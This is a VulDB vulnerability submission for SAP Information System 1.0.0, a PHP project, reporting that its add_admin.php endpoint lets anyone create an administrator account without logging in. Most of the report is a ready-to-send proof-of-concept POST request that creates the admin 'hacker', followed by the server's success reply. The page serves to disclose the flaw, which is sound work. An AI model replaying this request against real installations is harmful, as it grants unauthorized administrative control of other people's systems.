提出 #34203: SAP Information System 1.0.0 - Improper Authentication情報

タイトル	SAP Information System 1.0.0 - Improper Authentication
説明	Summary: SAP Information System version 1.0.0 suffers from an improper authentication vulnerability that allows a malicious user to create an administrative account without needing to authenticate. The POST request is sent to the /SAP_Information_System/controllers/add_admin.php endpoint. The problem occurs due to lack of session verification in the request. Steps to Reproduce: 1. Copy this request and change the host and send it to the server: ############################################ POST /SAP_Information_System/controllers/add_admin.php HTTP/1.1 Host: target.com Content-Length: 345 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYELEK8fMdX63l0iI Origin: http://target.com Referer: http://target.com/SAP_Information_System/Dashboard/pages/Admin.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=jjnkf4nmpdm7sca82btt2r4s1c Connection: close ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="username" hacker ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="password" P@ssw0rd! ------WebKitFormBoundaryYELEK8fMdX63l0iI Content-Disposition: form-data; name="user" admin ------WebKitFormBoundaryYELEK8fMdX63l0iI-- ############################################ Reply: ############################################ HTTP/1.1 200 OK Date: Tue, 05 Apr 2022 16:15:46 GMT Server: Apache Vary: Accept-Encoding Content-Length: 267 Connection: close Content-Type: text/html; charset=UTF-8 <script type="text/javascript">setTimeout(function () { swal("Add Admin Successfully!","Message!","success");}, 1000);</script><script type="text/javascript">setTimeout(function(){window.location = "/SAP_Information_System/Dashboard/pages/Admin.php"},1000)</script> ############################################ 2. Go to the login page and enter the hacker:P@ssw0rd! credential. After that you will be logged in with an administrative account.
ソース	⚠️ https://www.sourcecodester.com/php/15262/sap-information-system-using-phppdo-oop.html
ユーザー	mrempy (UID 24379)
送信	2022年04月05日 23:26 (4 年 ago)
モデレーション	2022年04月06日 04:56 (5 hours later)
ステータス	承諾済み
VulDBエントリ	196550 [SAP Information System 1.0 POST Request add_admin.php 弱い認証]
ポイント	20

◂ 前概要次 ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!